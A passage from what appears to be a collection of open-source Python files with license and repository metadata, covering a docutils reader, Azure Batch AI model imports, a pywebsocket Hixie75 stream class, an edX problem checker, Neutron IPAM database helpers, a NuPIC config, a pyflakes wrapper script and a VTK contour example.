(('Disable the promotion of a lone top-level section title to '
'document title (and subsequent section title to document '
'subtitle promotion; enabled by default).',
['--no-doc-title'],
{'dest': 'doctitle_xform', 'action': 'store_false', 'default': 1,
'validator': frontend.validate_boolean}),
('Disable the bibliographic field list transform (enabled by '
'default).',
['--no-doc-info'],
{'dest': 'docinfo_xform', 'action': 'store_false', 'default': 1,
'validator': frontend.validate_boolean}),
('Activate the promotion of lone subsection titles to '
'section subtitles (disabled by default).',
['--section-subtitles'],
{'dest': 'sectsubtitle_xform', 'action': 'store_true', 'default': 0,
'validator': frontend.validate_boolean}),
('Deactivate the promotion of lone subsection titles.',
['--no-section-subtitles'],
{'dest': 'sectsubtitle_xform', 'action': 'store_false'}),
))
config_section = 'standalone reader'
config_section_dependencies = ('readers',)
def get_transforms(self):
return readers.Reader.get_transforms(self) + [
references.Substitutions,
references.PropagateTargets,
frontmatter.DocTitle,
frontmatter.SectionSubTitle,
frontmatter.DocInfo,
references.AnonymousHyperlinks,
references.IndirectHyperlinks,
references.Footnotes,
references.ExternalTargets,
references.InternalTargets,
references.DanglingReferences,
misc.Transitions,
]
| agpl-3.0 |
Azure/azure-sdk-for-python | sdk/batchai/azure-mgmt-batchai/azure/mgmt/batchai/models/__init__.py | 1 | 11819 | # coding=utf-8
# --------------------------------------------------------------------------
# Copyright (c) Microsoft Corporation. All rights reserved.
# Licensed under the MIT License. See License.txt in the project root for license information.
# Code generated by Microsoft (R) AutoRest Code Generator.
# Changes may cause incorrect behavior and will be lost if the code is regenerated.
# --------------------------------------------------------------------------
try:
from ._models_py3 import AppInsightsReference
from ._models_py3 import AutoScaleSettings
from ._models_py3 import AzureBlobFileSystemReference
from ._models_py3 import AzureFileShareReference
from ._models_py3 import AzureStorageCredentialsInfo
from ._models_py3 import BatchAIError
from ._models_py3 import CNTKsettings
from ._models_py3 import Caffe2Settings
from ._models_py3 import CaffeSettings
from ._models_py3 import ChainerSettings
from ._models_py3 import CloudErrorBody
from ._models_py3 import Cluster
from ._models_py3 import ClusterCreateParameters
from ._models_py3 import ClusterListResult
from ._models_py3 import ClusterUpdateParameters
from ._models_py3 import ClustersListByWorkspaceOptions
from ._models_py3 import ContainerSettings
from ._models_py3 import CustomMpiSettings
from ._models_py3 import CustomToolkitSettings
from ._models_py3 import DataDisks
from ._models_py3 import EnvironmentVariable
from ._models_py3 import EnvironmentVariableWithSecretValue
from ._models_py3 import Experiment
from ._models_py3 import ExperimentListResult
from ._models_py3 import ExperimentsListByWorkspaceOptions
from ._models_py3 import File
from ._models_py3 import FileListResult
from ._models_py3 import FileServer
from ._models_py3 import FileServerCreateParameters
from ._models_py3 import FileServerListResult
from ._models_py3 import FileServerReference
from ._models_py3 import FileServersListByWorkspaceOptions
from ._models_py3 import HorovodSettings
from ._models_py3 import ImageReference
from ._models_py3 import ImageSourceRegistry
from ._models_py3 import InputDirectory
from ._models_py3 import Job
from ._models_py3 import JobBasePropertiesConstraints
from ._models_py3 import JobCreateParameters
from ._models_py3 import JobListResult
from ._models_py3 import JobPreparation
from ._models_py3 import JobPropertiesConstraints
from ._models_py3 import JobPropertiesExecutionInfo
from ._models_py3 import JobsListByExperimentOptions
from ._models_py3 import JobsListOutputFilesOptions
from ._models_py3 import KeyVaultSecretReference
from ._models_py3 import ListUsagesResult
from ._models_py3 import ManualScaleSettings
from ._models_py3 import MountSettings
from ._models_py3 import MountVolumes
from ._models_py3 import NameValuePair
from ._models_py3 import NodeSetup
from ._models_py3 import NodeStateCounts
from ._models_py3 import Operation
from ._models_py3 import OperationDisplay
from ._models_py3 import OperationListResult
from ._models_py3 import OutputDirectory
from ._models_py3 import PerformanceCountersSettings
from ._models_py3 import PrivateRegistryCredentials
from ._models_py3 import ProxyResource
from ._models_py3 import PyTorchSettings
from ._models_py3 import RemoteLoginInformation
from ._models_py3 import RemoteLoginInformationListResult
from ._models_py3 import Resource
from ._models_py3 import ResourceId
from ._models_py3 import ScaleSettings
from ._models_py3 import SetupTask
from ._models_py3 import SshConfiguration
from ._models_py3 import TensorFlowSettings
from ._models_py3 import UnmanagedFileSystemReference
from ._models_py3 import Usage
from ._models_py3 import UsageName
from ._models_py3 import UserAccountSettings
from ._models_py3 import VirtualMachineConfiguration
from ._models_py3 import Workspace
from ._models_py3 import WorkspaceCreateParameters
from ._models_py3 import WorkspaceListResult
from ._models_py3 import WorkspaceUpdateParameters
from ._models_py3 import WorkspacesListByResourceGroupOptions
from ._models_py3 import WorkspacesListOptions
except (SyntaxError, ImportError):
from ._models import AppInsightsReference # type: ignore
from ._models import AutoScaleSettings # type: ignore
from ._models import AzureBlobFileSystemReference # type: ignore
from ._models import AzureFileShareReference # type: ignore
from ._models import AzureStorageCredentialsInfo # type: ignore
from ._models import BatchAIError # type: ignore
from ._models import CNTKsettings # type: ignore
from ._models import Caffe2Settings # type: ignore
from ._models import CaffeSettings # type: ignore
from ._models import ChainerSettings # type: ignore
from ._models import CloudErrorBody # type: ignore
from ._models import Cluster # type: ignore
from ._models import ClusterCreateParameters # type: ignore
from ._models import ClusterListResult # type: ignore
from ._models import ClusterUpdateParameters # type: ignore
from ._models import ClustersListByWorkspaceOptions # type: ignore
from ._models import ContainerSettings # type: ignore
from ._models import CustomMpiSettings # type: ignore
from ._models import CustomToolkitSettings # type: ignore
from ._models import DataDisks # type: ignore
from ._models import EnvironmentVariable # type: ignore
from ._models import EnvironmentVariableWithSecretValue # type: ignore
from ._models import Experiment # type: ignore
from ._models import ExperimentListResult # type: ignore
from ._models import ExperimentsListByWorkspaceOptions # type: ignore
from ._models import File # type: ignore
from ._models import FileListResult # type: ignore
from ._models import FileServer # type: ignore
from ._models import FileServerCreateParameters # type: ignore
from ._models import FileServerListResult # type: ignore
from ._models import FileServerReference # type: ignore
from ._models import FileServersListByWorkspaceOptions # type: ignore
from ._models import HorovodSettings # type: ignore
from ._models import ImageReference # type: ignore
from ._models import ImageSourceRegistry # type: ignore
from ._models import InputDirectory # type: ignore
from ._models import Job # type: ignore
from ._models import JobBasePropertiesConstraints # type: ignore
from ._models import JobCreateParameters # type: ignore
from ._models import JobListResult # type: ignore
from ._models import JobPreparation # type: ignore
from ._models import JobPropertiesConstraints # type: ignore
from ._models import JobPropertiesExecutionInfo # type: ignore
from ._models import JobsListByExperimentOptions # type: ignore
from ._models import JobsListOutputFilesOptions # type: ignore
from ._models import KeyVaultSecretReference # type: ignore
from ._models import ListUsagesResult # type: ignore
from ._models import ManualScaleSettings # type: ignore
from ._models import MountSettings # type: ignore
from ._models import MountVolumes # type: ignore
from ._models import NameValuePair # type: ignore
from ._models import NodeSetup # type: ignore
from ._models import NodeStateCounts # type: ignore
from ._models import Operation # type: ignore
from ._models import OperationDisplay # type: ignore
from ._models import OperationListResult # type: ignore
from ._models import OutputDirectory # type: ignore
from ._models import PerformanceCountersSettings # type: ignore
from ._models import PrivateRegistryCredentials # type: ignore
from ._models import ProxyResource # type: ignore
from ._models import PyTorchSettings # type: ignore
from ._models import RemoteLoginInformation # type: ignore
from ._models import RemoteLoginInformationListResult # type: ignore
from ._models import Resource # type: ignore
from ._models import ResourceId # type: ignore
from ._models import ScaleSettings # type: ignore
from ._models import SetupTask # type: ignore
from ._models import SshConfiguration # type: ignore
from ._models import TensorFlowSettings # type: ignore
from ._models import UnmanagedFileSystemReference # type: ignore
from ._models import Usage # type: ignore
from ._models import UsageName # type: ignore
from ._models import UserAccountSettings # type: ignore
from ._models import VirtualMachineConfiguration # type: ignore
from ._models import Workspace # type: ignore
from ._models import WorkspaceCreateParameters # type: ignore
from ._models import WorkspaceListResult # type: ignore
from ._models import WorkspaceUpdateParameters # type: ignore
from ._models import WorkspacesListByResourceGroupOptions # type: ignore
from ._models import WorkspacesListOptions # type: ignore
from ._batch_ai_enums import (
AllocationState,
CachingType,
DeallocationOption,
ExecutionState,
FileServerProvisioningState,
FileType,
JobPriority,
ProvisioningState,
StorageAccountType,
ToolType,
UsageUnit,
VmPriority,
)
__all__ = [
'AppInsightsReference',
'AutoScaleSettings',
'AzureBlobFileSystemReference',
'AzureFileShareReference',
'AzureStorageCredentialsInfo',
'BatchAIError',
'CNTKsettings',
'Caffe2Settings',
'CaffeSettings',
'ChainerSettings',
'CloudErrorBody',
'Cluster',
'ClusterCreateParameters',
'ClusterListResult',
'ClusterUpdateParameters',
'ClustersListByWorkspaceOptions',
'ContainerSettings',
'CustomMpiSettings',
'CustomToolkitSettings',
'DataDisks',
'EnvironmentVariable',
'EnvironmentVariableWithSecretValue',
'Experiment',
'ExperimentListResult',
'ExperimentsListByWorkspaceOptions',
'File',
'FileListResult',
'FileServer',
'FileServerCreateParameters',
'FileServerListResult',
'FileServerReference',
'FileServersListByWorkspaceOptions',
'HorovodSettings',
'ImageReference',
'ImageSourceRegistry',
'InputDirectory',
'Job',
'JobBasePropertiesConstraints',
'JobCreateParameters',
'JobListResult',
'JobPreparation',
'JobPropertiesConstraints',
'JobPropertiesExecutionInfo',
'JobsListByExperimentOptions',
'JobsListOutputFilesOptions',
'KeyVaultSecretReference',
'ListUsagesResult',
'ManualScaleSettings',
'MountSettings',
'MountVolumes',
'NameValuePair',
'NodeSetup',
'NodeStateCounts',
'Operation',
'OperationDisplay',
'OperationListResult',
'OutputDirectory',
'PerformanceCountersSettings',
'PrivateRegistryCredentials',
'ProxyResource',
'PyTorchSettings',
'RemoteLoginInformation',
'RemoteLoginInformationListResult',
'Resource',
'ResourceId',
'ScaleSettings',
'SetupTask',
'SshConfiguration',
'TensorFlowSettings',
'UnmanagedFileSystemReference',
'Usage',
'UsageName',
'UserAccountSettings',
'VirtualMachineConfiguration',
'Workspace',
'WorkspaceCreateParameters',
'WorkspaceListResult',
'WorkspaceUpdateParameters',
'WorkspacesListByResourceGroupOptions',
'WorkspacesListOptions',
'AllocationState',
'CachingType',
'DeallocationOption',
'ExecutionState',
'FileServerProvisioningState',
'FileType',
'JobPriority',
'ProvisioningState',
'StorageAccountType',
'ToolType',
'UsageUnit',
'VmPriority',
]
| mit |
autrilla/servo | tests/wpt/web-platform-tests/tools/pywebsocket/src/mod_pywebsocket/_stream_hixie75.py | 681 | 8842 | # Copyright 2011, Google Inc.
# All rights reserved.
#
# Redistribution and use in source and binary forms, with or without
# modification, are permitted provided that the following conditions are
# met:
#
# * Redistributions of source code must retain the above copyright
# notice, this list of conditions and the following disclaimer.
# * Redistributions in binary form must reproduce the above
# copyright notice, this list of conditions and the following disclaimer
# in the documentation and/or other materials provided with the
# distribution.
# * Neither the name of Google Inc. nor the names of its
# contributors may be used to endorse or promote products derived from
# this software without specific prior written permission.
#
# THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS
# "AS IS" AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT
# LIMITED TO, THE IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR
# A PARTICULAR PURPOSE ARE DISCLAIMED. IN NO EVENT SHALL THE COPYRIGHT
# OWNER OR CONTRIBUTORS BE LIABLE FOR ANY DIRECT, INDIRECT, INCIDENTAL,
# SPECIAL, EXEMPLARY, OR CONSEQUENTIAL DAMAGES (INCLUDING, BUT NOT
# LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR SERVICES; LOSS OF USE,
# DATA, OR PROFITS; OR BUSINESS INTERRUPTION) HOWEVER CAUSED AND ON ANY
# THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT LIABILITY, OR TORT
# (INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY OUT OF THE USE
# OF THIS SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF SUCH DAMAGE.
"""This file provides a class for parsing/building frames of the WebSocket
protocol version HyBi 00 and Hixie 75.
Specification:
- HyBi 00 http://tools.ietf.org/html/draft-ietf-hybi-thewebsocketprotocol-00
- Hixie 75 http://tools.ietf.org/html/draft-hixie-thewebsocketprotocol-75
"""
from mod_pywebsocket import common
from mod_pywebsocket._stream_base import BadOperationException
from mod_pywebsocket._stream_base import ConnectionTerminatedException
from mod_pywebsocket._stream_base import InvalidFrameException
from mod_pywebsocket._stream_base import StreamBase
from mod_pywebsocket._stream_base import UnsupportedFrameException
from mod_pywebsocket import util
class StreamHixie75(StreamBase):
"""A class for parsing/building frames of the WebSocket protocol version
HyBi 00 and Hixie 75.
"""
def __init__(self, request, enable_closing_handshake=False):
"""Construct an instance.
Args:
request: mod_python request.
enable_closing_handshake: to let StreamHixie75 perform closing
handshake as specified in HyBi 00, set
this option to True.
"""
StreamBase.__init__(self, request)
self._logger = util.get_class_logger(self)
self._enable_closing_handshake = enable_closing_handshake
self._request.client_terminated = False
self._request.server_terminated = False
def send_message(self, message, end=True, binary=False):
"""Send message.
Args:
message: unicode string to send.
binary: not used in hixie75.
Raises:
BadOperationException: when called on a server-terminated
connection.
"""
if not end:
raise BadOperationException(
'StreamHixie75 doesn\'t support send_message with end=False')
if binary:
raise BadOperationException(
'StreamHixie75 doesn\'t support send_message with binary=True')
if self._request.server_terminated:
raise BadOperationException(
'Requested send_message after sending out a closing handshake')
self._write(''.join(['\x00', message.encode('utf-8'), '\xff']))
def _read_payload_length_hixie75(self):
"""Reads a length header in a Hixie75 version frame with length.
Raises:
ConnectionTerminatedException: when read returns empty string.
"""
length = 0
while True:
b_str = self._read(1)
b = ord(b_str)
length = length * 128 + (b & 0x7f)
if (b & 0x80) == 0:
break
return length
def receive_message(self):
"""Receive a WebSocket frame and return its payload an unicode string.
Returns:
payload unicode string in a WebSocket frame.
Raises:
ConnectionTerminatedException: when read returns empty
string.
BadOperationException: when called on a client-terminated
connection.
"""
if self._request.client_terminated:
raise BadOperationException(
'Requested receive_message after receiving a closing '
'handshake')
while True:
# Read 1 byte.
# mp_conn.read will block if no bytes are available.
# Timeout is controlled by TimeOut directive of Apache.
frame_type_str = self.receive_bytes(1)
frame_type = ord(frame_type_str)
if (frame_type & 0x80) == 0x80:
# The payload length is specified in the frame.
# Read and discard.
length = self._read_payload_length_hixie75()
if length > 0:
_ = self.receive_bytes(length)
# 5.3 3. 12. if /type/ is 0xFF and /length/ is 0, then set the
# /client terminated/ flag and abort these steps.
if not self._enable_closing_handshake:
continue
if frame_type == 0xFF and length == 0:
self._request.client_terminated = True
if self._request.server_terminated:
self._logger.debug(
'Received ack for server-initiated closing '
'handshake')
return None
self._logger.debug(
'Received client-initiated closing handshake')
self._send_closing_handshake()
self._logger.debug(
'Sent ack for client-initiated closing handshake')
return None
else:
# The payload is delimited with \xff.
bytes = self._read_until('\xff')
# The WebSocket protocol section 4.4 specifies that invalid
# characters must be replaced with U+fffd REPLACEMENT
# CHARACTER.
message = bytes.decode('utf-8', 'replace')
if frame_type == 0x00:
return message
# Discard data of other types.
def _send_closing_handshake(self):
if not self._enable_closing_handshake:
raise BadOperationException(
'Closing handshake is not supported in Hixie 75 protocol')
self._request.server_terminated = True
# 5.3 the server may decide to terminate the WebSocket connection by
# running through the following steps:
# 1. send a 0xFF byte and a 0x00 byte to the client to indicate the
# start of the closing handshake.
self._write('\xff\x00')
def close_connection(self, unused_code='', unused_reason=''):
"""Closes a WebSocket connection.
Raises:
ConnectionTerminatedException: when closing handshake was
not successfull.
"""
if self._request.server_terminated:
self._logger.debug(
'Requested close_connection but server is already terminated')
return
if not self._enable_closing_handshake:
self._request.server_terminated = True
self._logger.debug('Connection closed')
return
self._send_closing_handshake()
self._logger.debug('Sent server-initiated closing handshake')
# TODO(ukai): 2. wait until the /client terminated/ flag has been set,
# or until a server-defined timeout expires.
#
# For now, we expect receiving closing handshake right after sending
# out closing handshake, and if we couldn't receive non-handshake
# frame, we take it as ConnectionTerminatedException.
message = self.receive_message()
if message is not None:
raise ConnectionTerminatedException(
'Didn\'t receive valid ack for closing handshake')
# TODO: 3. close the WebSocket connection.
# note: mod_python Connection (mp_conn) doesn't have close method.
def send_ping(self, body):
raise BadOperationException(
'StreamHixie75 doesn\'t support send_ping')
# vi:sts=4 sw=4 et
| mpl-2.0 |
halvertoluke/edx-platform | common/lib/capa/capa/checker.py | 101 | 5906 | #!/usr/bin/env python
"""
Commandline tool for doing operations on Problems
"""
from __future__ import unicode_literals
import argparse
import logging
import sys
from path import Path as path
from cStringIO import StringIO
from calc import UndefinedVariable
from capa.capa_problem import LoncapaProblem
from mako.lookup import TemplateLookup
logging.basicConfig(format="%(levelname)s %(message)s")
log = logging.getLogger('capa.checker')
class DemoSystem(object):
def __init__(self):
self.lookup = TemplateLookup(directories=[path(__file__).dirname() / 'templates'])
self.DEBUG = True
def render_template(self, template_filename, dictionary, context=None):
if context is None:
context = {}
context_dict = {}
context_dict.update(dictionary)
context_dict.update(context)
return self.lookup.get_template(template_filename).render(**context_dict)
def main():
parser = argparse.ArgumentParser(description='Check Problem Files')
parser.add_argument("command", choices=['test', 'show']) # Watch? Render? Open?
parser.add_argument("files", nargs="+", type=argparse.FileType('r'))
parser.add_argument("--seed", required=False, type=int)
parser.add_argument("--log-level", required=False, default="INFO",
choices=['info', 'debug', 'warn', 'error',
'INFO', 'DEBUG', 'WARN', 'ERROR'])
args = parser.parse_args()
log.setLevel(args.log_level.upper())
system = DemoSystem()
for problem_file in args.files:
log.info("Opening {0}".format(problem_file.name))
try:
problem = LoncapaProblem(problem_file, "fakeid", seed=args.seed, system=system)
except Exception as ex:
log.error("Could not parse file {0}".format(problem_file.name))
log.exception(ex)
continue
if args.command == 'test':
command_test(problem)
elif args.command == 'show':
command_show(problem)
problem_file.close()
# In case we want to do anything else here.
def command_show(problem):
"""Display the text for this problem"""
print problem.get_html()
def command_test(problem):
# We're going to trap stdout/stderr from the problems (yes, some print)
old_stdout, old_stderr = sys.stdout, sys.stderr
try:
sys.stdout = StringIO()
sys.stderr = StringIO()
check_that_suggested_answers_work(problem)
check_that_blanks_fail(problem)
log_captured_output(sys.stdout,
"captured stdout from {0}".format(problem))
log_captured_output(sys.stderr,
"captured stderr from {0}".format(problem))
except Exception as e:
log.exception(e)
finally:
sys.stdout, sys.stderr = old_stdout, old_stderr
def check_that_blanks_fail(problem):
"""Leaving it blank should never work. Neither should a space."""
blank_answers = dict((answer_id, u"")
for answer_id in problem.get_question_answers())
grading_results = problem.grade_answers(blank_answers)
try:
assert all(result == 'incorrect' for result in grading_results.values())
except AssertionError:
log.error("Blank accepted as correct answer in {0} for {1}"
.format(problem,
[answer_id for answer_id, result
in sorted(grading_results.items())
if result != 'incorrect']))
def check_that_suggested_answers_work(problem):
"""Split this up so that we're only used for formula/numeric answers.
Examples of where this fails:
* Displayed answers use units but acceptable ones do not.
- L1e0.xml
- Presents itself as UndefinedVariable (when it tries to pass to calc)
* "a or d" is what's displayed, but only "a" or "d" is accepted, not the
string "a or d".
- L1-e00.xml
"""
# These are actual answers we get from the responsetypes
real_answers = problem.get_question_answers()
# all_answers is real_answers + blanks for other answer_ids for which the
# responsetypes can't provide us pre-canned answers (customresponse)
all_answer_ids = problem.get_answer_ids()
all_answers = dict((answer_id, real_answers.get(answer_id, ""))
for answer_id in all_answer_ids)
log.debug("Real answers: {0}".format(real_answers))
if real_answers:
try:
real_results = dict((answer_id, result) for answer_id, result
in problem.grade_answers(all_answers).items()
if answer_id in real_answers)
log.debug(real_results)
assert(all(result == 'correct'
for answer_id, result in real_results.items()))
except UndefinedVariable as uv_exc:
log.error("The variable \"{0}\" specified in the ".format(uv_exc) +
"solution isn't recognized (is it a units measure?).")
except AssertionError:
log.error("The following generated answers were not accepted for {0}:"
.format(problem))
for question_id, result in sorted(real_results.items()):
if result != 'correct':
log.error(" {0} = {1}".format(question_id, real_answers[question_id]))
except Exception as ex:
log.error("Uncaught error in {0}".format(problem))
log.exception(ex)
def log_captured_output(output_stream, stream_name):
output_stream.seek(0)
output_text = output_stream.read()
if output_text:
log.info("##### Begin {0} #####\n".format(stream_name) + output_text)
log.info("##### End {0} #####".format(stream_name))
if __name__ == '__main__':
sys.exit(main())
| agpl-3.0 |
jacknjzhou/neutron | neutron/ipam/drivers/neutrondb_ipam/db_api.py | 22 | 8761 | # Copyright 2015 OpenStack LLC.
# All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License"); you may
# not use this file except in compliance with the License. You may obtain
# a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS, WITHOUT
# WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the
# License for the specific language governing permissions and limitations
# under the License.
from oslo_log import log
from oslo_utils import uuidutils
from neutron.ipam.drivers.neutrondb_ipam import db_models
LOG = log.getLogger(__name__)
# Database operations for Neutron's DB-backed IPAM driver
class IpamSubnetManager(object):
@classmethod
def load_by_neutron_subnet_id(cls, session, neutron_subnet_id):
return session.query(db_models.IpamSubnet).filter_by(
neutron_subnet_id=neutron_subnet_id).first()
def __init__(self, ipam_subnet_id, neutron_subnet_id):
self._ipam_subnet_id = ipam_subnet_id
self._neutron_subnet_id = neutron_subnet_id
@property
def neutron_id(self):
return self._neutron_subnet_id
def create(self, session):
"""Create database models for an IPAM subnet.
This method creates a subnet resource for the IPAM driver and
associates it with its neutron identifier, if specified.
:param session: database sesssion.
:returns: the idenfier of created IPAM subnet
"""
if not self._ipam_subnet_id:
self._ipam_subnet_id = uuidutils.generate_uuid()
ipam_subnet = db_models.IpamSubnet(
id=self._ipam_subnet_id,
neutron_subnet_id=self._neutron_subnet_id)
session.add(ipam_subnet)
return self._ipam_subnet_id
@classmethod
def delete(cls, session, neutron_subnet_id):
"""Delete IPAM subnet.
IPAM subnet no longer has foreign key to neutron subnet,
so need to perform delete manually
:param session: database sesssion
:param neutron_subnet_id: neutron subnet id associated with ipam subnet
"""
return session.query(db_models.IpamSubnet).filter_by(
neutron_subnet_id=neutron_subnet_id).delete()
def create_pool(self, session, pool_start, pool_end):
"""Create an allocation pool and availability ranges for the subnet.
This method does not perform any validation on parameters; it simply
persist data on the database.
:param pool_start: string expressing the start of the pool
:param pool_end: string expressing the end of the pool
:return: the newly created pool object.
"""
ip_pool = db_models.IpamAllocationPool(
ipam_subnet_id=self._ipam_subnet_id,
first_ip=pool_start,
last_ip=pool_end)
session.add(ip_pool)
ip_range = db_models.IpamAvailabilityRange(
allocation_pool=ip_pool,
first_ip=pool_start,
last_ip=pool_end)
session.add(ip_range)
return ip_pool
def delete_allocation_pools(self, session):
"""Remove all allocation pools for the current subnet.
:param session: database session
"""
session.query(db_models.IpamAllocationPool).filter_by(
ipam_subnet_id=self._ipam_subnet_id).delete()
def list_pools(self, session):
"""Return pools for the current subnet."""
return session.query(
db_models.IpamAllocationPool).filter_by(
ipam_subnet_id=self._ipam_subnet_id)
def _range_query(self, session, locking):
range_qry = session.query(
db_models.IpamAvailabilityRange).join(
db_models.IpamAllocationPool).filter_by(
ipam_subnet_id=self._ipam_subnet_id)
if locking:
range_qry = range_qry.with_lockmode('update')
return range_qry
def get_first_range(self, session, locking=False):
"""Return the first availability range for the subnet
:param session: database session
:param locking: specifies whether a write-intent lock should be
performed on the database operation
:return: first available range as instance of
neutron.ipam.drivers.neutrondb_ipam.db_models.IpamAvailabilityRange
"""
return self._range_query(session, locking).first()
def list_ranges_by_subnet_id(self, session, locking=False):
"""Return availability ranges for a given ipam subnet
:param session: database session
:param locking: specifies whether a write-intent lock should be
acquired with this database operation.
:return: list of availability ranges as instances of
neutron.ipam.drivers.neutrondb_ipam.db_models.IpamAvailabilityRange
"""
return self._range_query(session, locking)
def list_ranges_by_allocation_pool(self, session, allocation_pool_id,
locking=False):
"""Return availability ranges for a given pool.
:param session: database session
:param allocation_pool_id: allocation pool identifier
:param locking: specifies whether a write-intent lock should be
acquired with this database operation.
:return: list of availability ranges as instances of
neutron.ipam.drivers.neutrondb_ipam.db_models.IpamAvailabilityRange
"""
return session.query(
db_models.IpamAvailabilityRange).join(
db_models.IpamAllocationPool).filter_by(
id=allocation_pool_id)
def create_range(self, session, allocation_pool_id,
range_start, range_end):
"""Create an availabilty range for a given pool.
This method does not perform any validation on parameters; it simply
persist data on the database.
:param session: database session
:param allocation_pool_id: allocation pool identifier
:param range_start: first ip address in the range
:param range_end: last ip address in the range
:return: the newly created availability range as an instance of
neutron.ipam.drivers.neutrondb_ipam.db_models.IpamAvailabilityRange
"""
new_ip_range = db_models.IpamAvailabilityRange(
allocation_pool_id=allocation_pool_id,
first_ip=range_start,
last_ip=range_end)
session.add(new_ip_range)
return new_ip_range
def check_unique_allocation(self, session, ip_address):
"""Validate that the IP address on the subnet is not in use."""
iprequest = session.query(db_models.IpamAllocation).filter_by(
ipam_subnet_id=self._ipam_subnet_id, status='ALLOCATED',
ip_address=ip_address).first()
if iprequest:
return False
return True
def list_allocations(self, session, status='ALLOCATED', locking=False):
"""Return current allocations for the subnet.
:param session: database session
:param status: IP allocation status
:param locking: specifies whether a write-intent lock should be
performed on the database operation
:returns: a list of IP allocation as instance of
neutron.ipam.drivers.neutrondb_ipam.db_models.IpamAllocation
"""
ip_qry = session.query(
db_models.IpamAllocation).filter_by(
ipam_subnet_id=self._ipam_subnet_id,
status=status)
if locking:
ip_qry = ip_qry.with_lockmode('update')
return ip_qry
def create_allocation(self, session, ip_address,
status='ALLOCATED'):
"""Create an IP allocation entry.
:param session: database session
:param ip_address: the IP address to allocate
:param status: IP allocation status
"""
ip_request = db_models.IpamAllocation(
ip_address=ip_address,
status=status,
ipam_subnet_id=self._ipam_subnet_id)
session.add(ip_request)
def delete_allocation(self, session, ip_address):
"""Remove an IP allocation for this subnet.
:param session: database session
:param ip_address: IP address for which the allocation entry should
be removed.
"""
return session.query(db_models.IpamAllocation).filter_by(
ip_address=ip_address,
ipam_subnet_id=self._ipam_subnet_id).delete(
synchronize_session=False)
| apache-2.0 |
gamahead/nupic | examples/opf/experiments/classification/scalar_TP_0/description.py | 17 | 1684 | # ----------------------------------------------------------------------
# Numenta Platform for Intelligent Computing (NuPIC)
# Copyright (C) 2013, Numenta, Inc. Unless you have an agreement
# with Numenta, Inc., for a separate license for this software code, the
# following terms and conditions apply:
#
# This program is free software: you can redistribute it and/or modify
# it under the terms of the GNU General Public License version 3 as
# published by the Free Software Foundation.
#
# This program is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE.
# See the GNU General Public License for more details.
#
# You should have received a copy of the GNU General Public License
# along with this program. If not, see http://www.gnu.org/licenses.
#
# http://numenta.org/licenses/
# ----------------------------------------------------------------------
## This file defines parameters for a prediction experiment.
import os
from nupic.frameworks.opf.expdescriptionhelpers import importBaseDescription
# the sub-experiment configuration
config = \
{ 'claEvalClassification': True,
'dataSource': 'file://' + os.path.join(os.path.dirname(__file__),
'../datasets/scalar_TP_0.csv'),
'modelParams': { 'clParams': { 'clVerbosity': 0},
'sensorParams': { 'encoders': { }, 'verbosity': 0},
'spParams': { },
'tpEnable': True,
'tpParams': { }}}
mod = importBaseDescription('../base_scalar/description.py', config)
locals().update(mod.__dict__)
| gpl-3.0 |
davidt/reviewboard | contrib/internal/run-pyflakes.py | 10 | 1740 | #!/usr/bin/env python
#
# Utility script to run pyflakes with the modules we care about and
# exclude errors we know to be fine.
from __future__ import print_function, unicode_literals
import os
import re
import subprocess
import sys
module_exclusions = (
'build',
'djblets',
'django_evolution',
'dist',
'ez_setup.py',
'fabfile.py',
'settings_local.py',
'reviewboard/htdocs',
'ReviewBoard.egg-info',
)
def scan_for_modules():
return [entry
for entry in os.listdir(os.getcwd())
if ((os.path.isdir(entry) or entry.endswith(".py")) and
entry not in module_exclusions)]
def main():
cur_dir = os.path.dirname(__file__)
os.chdir(os.path.join(cur_dir, "..", ".."))
modules = sys.argv[1:]
if not modules:
# The user didn't specify anything specific. Scan for modules.
modules = scan_for_modules()
p = subprocess.Popen(['pyflakes'] + modules,
stderr=subprocess.PIPE,
stdout=subprocess.PIPE,
close_fds=True)
contents = p.stdout.readlines()
# Read in the exclusions file
exclusions = {}
with open(os.path.join(cur_dir, "pyflakes.exclude"), "r") as fp:
for line in fp:
if not line.startswith("#"):
exclusions[line.rstrip()] = 1
# Now filter things
for line in contents:
line = line.rstrip()
test_line = re.sub(r':[0-9]+:', r':*:', line, 1)
test_line = re.sub(r'line [0-9]+', r'line *', test_line)
if (test_line not in exclusions and
not test_line.startswith(module_exclusions)):
print(line)
if __name__ == "__main__":
main()
| mit |
Wuteyan/VTK | Examples/ImageProcessing/Python/Contours2D.py | 15 | 2351 | #!/usr/bin/env python
# This example shows how to sample a mathematical function over a
# volume. A slice from the volume is then extracted and then contoured
# to produce 2D contour lines.
#
import vtk
# Quadric definition. This is a type of implicit function. Here the
# coefficients to the equations are set.
quadric = vtk.vtkQuadric()
quadric.SetCoefficients(.5, 1, .2, 0, .1, 0, 0, .2, 0, 0)
# The vtkSampleFunction uses the quadric function and evaluates function
# value over a regular lattice (i.e., a volume).
sample = vtk.vtkSampleFunction()
sample.SetSampleDimensions(30, 30, 30)
sample.SetImplicitFunction(quadric)
sample.ComputeNormalsOff()
sample.Update()
# Here a single slice (i.e., image) is extracted from the volume. (Note: in
# actuality the VOI request causes the sample function to operate on just the
# slice.)
extract = vtk.vtkExtractVOI()
extract.SetInputConnection(sample.GetOutputPort())
extract.SetVOI(0, 29, 0, 29, 15, 15)
extract.SetSampleRate(1, 2, 3)
# The image is contoured to produce contour lines. Thirteen contour values
# ranging from (0,1.2) inclusive are produced.
contours = vtk.vtkContourFilter()
contours.SetInputConnection(extract.GetOutputPort())
contours.GenerateValues(13, 0.0, 1.2)
# The contour lines are mapped to the graphics library.
contMapper = vtk.vtkPolyDataMapper()
contMapper.SetInputConnection(contours.GetOutputPort())
